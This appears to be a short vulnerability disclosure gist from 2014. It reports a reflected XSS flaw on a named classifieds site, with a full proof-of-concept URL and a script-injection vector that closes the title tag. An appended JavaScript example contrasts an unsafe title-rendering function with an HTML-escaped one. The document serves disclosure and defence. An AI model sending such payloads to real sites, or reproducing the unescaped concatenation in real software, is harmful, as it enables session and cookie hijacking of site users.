@MiguelBel
Created December 3, 2014 18:51
Bypass Google Chrome Auditor: No
Web: http://www.kapaza.be
Vulnerability: Reflected XSS
PoC (Proof of concept): http://www.kapaza.be/nl/li?w=3&q=%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+
Attack Vector: </title><script type="text/javascript">alert('xss');</script>
Description: Allows a user to execute custom JavaScript code, which can be used to hijack cookies and sessions. Can be very harmful in the hands of someone with bad intentions.
Solution: Escape the special chars '';!--"<XSS>=&{()}
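
The fix described under Solution, as an added example that is not part of the original report or the site's code: the `q` value from the PoC is encoded at the point of output so it can no longer close `<title>`. The function names and the `Search:` title template are assumptions, and the escape set is the HTML-significant subset of the listed characters.

```javascript
// Added example: output-encoding a reflected search term before it is
// written inside <title>. Names and the page template are hypothetical.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;', '=': '&#x3D;',
};

// Replace every character that can change the HTML parsing context.
// One pass over the input, so already-produced entities are not re-encoded.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'\/`=]/g, (ch) => HTML_ESCAPES[ch]);
}

// Read "q" the way a form-encoded query string is decoded ("+" is a space).
function getSearchTerm(url) {
  return new URL(url).searchParams.get('q') || '';
}

// Vulnerable form: the term is concatenated into the markup unchanged.
function renderTitleUnsafe(term) {
  return `<title>Search: ${term}</title>`;
}

// Hardened form: the term is encoded where it is emitted.
function renderTitleSafe(term) {
  return `<title>Search: ${escapeHtml(term)}</title>`;
}

// The PoC URL from the report above, used here as the test input.
const POC_URL = 'http://www.kapaza.be/nl/li?w=3&q=%3C%2Ftitle%3E%3Cscript+type%3D%22text%2Fjavascript%22%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E+';

const term = getSearchTerm(POC_URL);
console.log(renderTitleUnsafe(term)); // markup contains a live <script> element
console.log(renderTitleSafe(term));   // markup contains only inert entities
```

Encoding belongs at output time and must match the context: this set covers HTML text and quoted attribute values, not values placed inside inline scripts or URLs.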